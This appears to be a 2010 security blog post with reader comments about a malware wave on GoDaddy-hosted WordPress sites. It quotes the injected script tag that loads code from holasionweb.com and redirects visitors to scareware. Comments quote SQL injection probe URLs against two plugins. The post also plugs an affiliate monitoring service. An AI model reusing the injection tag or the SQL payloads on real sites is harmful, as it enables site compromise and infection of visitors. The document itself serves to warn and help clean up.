WordPress sites self-hosted on GoDaddy.com are reporting being maliciously hacked today with <script src="http://holasionweb.com/oo.php"></script>!
Warning: This is dangerous malware! Anyone visiting an infected website can get their computers infected, if they do not have a up-to-date anti-virus program using the latest threat definitions. If you receive a message to download anything when visiting an infected site, do NOT click "yes" or "okay" to download.
If your website is infected, put it down for maintenance immediately. There are instructions on how to do so at this post.
We have also received reports that this not only affected WordPress installations, but Joomla and other php-based platforms.
Here's the holasionweb symptoms:
- Infected sites get redirected to a fake AV (scareware).
- Some home pages are not showing the virus, but when clicking on a post or page, you will see the redirect (below).
- Redirects to a blank page at www.1.realsafe-23.net/?......
- Source code reveals <script src="http://holasionweb.com/oo.php"> in the the header section </head> of the infected pages.
How to fix your hacked WordPress site on GoDaddy.com
- We have written up instructions on how to remove malware and restore your WordPress site here.
- David Dede, of Sucuri.net, has written more information about this malware and created a simple clean up solution here.
We have informed Go Daddy's Security Department. We will continuously add updates to this post as they become available.
UPDATE 5/12/2010 at 10:15am: We have heard from Go Daddy. They are aware of this current issue and will be providing us with information soon.
UPDATE 5/12/2010 at 10:30am: I would suggest each of you that are infected with this virus have your website monitored. You can Get Web Security Reports in Minutes - Here's our affiliate link http://www.wpsecuritylock.com/sitesecuritymonitor
UPDATE 5/12/2010 at 12:00 pm: Here's a statement we just received from Go Daddy to share with you.
Bloggers,
We've identified and are working with the provider and hosting company from where the attacks are originating. With the help of the blogging community, we're close to breaking additional details related to recent malware attacks. Additional information will be provided to the other hosting providers involved in the same situation and the blogging community as available and as appropriate.
In the meantime, we've posted some perspective, additional information and quotable tidbits on the Go Daddy Blog: What's Up with Go Daddy, WordPress, PHP Exploits and Malware?
- Noah Plumb
Go Daddy Communications
UPDATE 5/11/2010 at 2:00pm: We are receiving reports that other hosting companies are infected with this malware. So it is spreading. Thank you for all your comments. We are doing our best to read and approve incoming comments, while we fix hacked websites.
VERY IMPORTANT!!! UPDATE 5/11/2010 at 5:20pm: Change your database password immediately. We are finding some sites that have mystery files contain database information that was copied from the wp-config.php file.
Securely yours,
Regina Smola
Follow me on Twitter
Follow WPSecurityLock on Twitter
About Regina Smola
Get your FREE e-book,
There is a better, faster and easier solution to this holasionweb problem, just read it at tintation.com
Hi Vladimir,
Thanks for your comment. The script great and fast. But... did you check your server to delete the trigger php file? This contains a different injected code that usually is found the day before it shoots into your php files.
Where do we look for this? I need to find it too I guess.
We have been finding it in the same directory that contains your wp-config.php file.
I found a VERY suspicious looking file (I deleted it) on my website named gdform.php. Here is the code it contained (it also had the base 64 encoded code identical to all the other php files at the top)
<?php
$request_method = $_SERVER["REQUEST_METHOD"];
if($request_method == "GET"){
$query_vars = $_GET;
} elseif ($request_method == "POST"){
$query_vars = $_POST;
}
reset($query_vars);
$t = date("U");
$file = $_SERVER['DOCUMENT_ROOT'] . "/../data/gdform_" . $t;
$fp = fopen($file,"w");
while (list ($key, $val) = each ($query_vars)) {
fputs($fp,"\n");
fputs($fp,"$val\n");
fputs($fp,"\n");
if ($key == "redirect") { $landing_page = $val;}
}
fclose($fp);
if ($landing_page != ""){
header("Location: http://".$_SERVER["HTTP_HOST"]."/$landing_page");
} else {
header("Location: http://".$_SERVER["HTTP_HOST"]."/");
}
?>
I wonder how they were able to place this file in my document root?
http://help.godaddy.com/article/510
The reason that file had the code on it is because the base64 code spreads to other php files.
I just had someone try and log in using the backend with an IP 188.72.213.44!
The webpage was my domain followed by /wp-content/plugins/wordspew/wordspew-rss.php?id=-998877+UNION+SELECT+0,1,0x6875616B,3,4,5--
and the Offending Parameter: id = -998877 UNION SELECT 0,1,0x6875616B,3,4,5--
I don't have the wordspew plugin.
He also tried using this plugin too
wp-content/plugins/wp-adserve/adclick.php?id=-1+union+select+0x6875616B
Thanks for fixing my blog!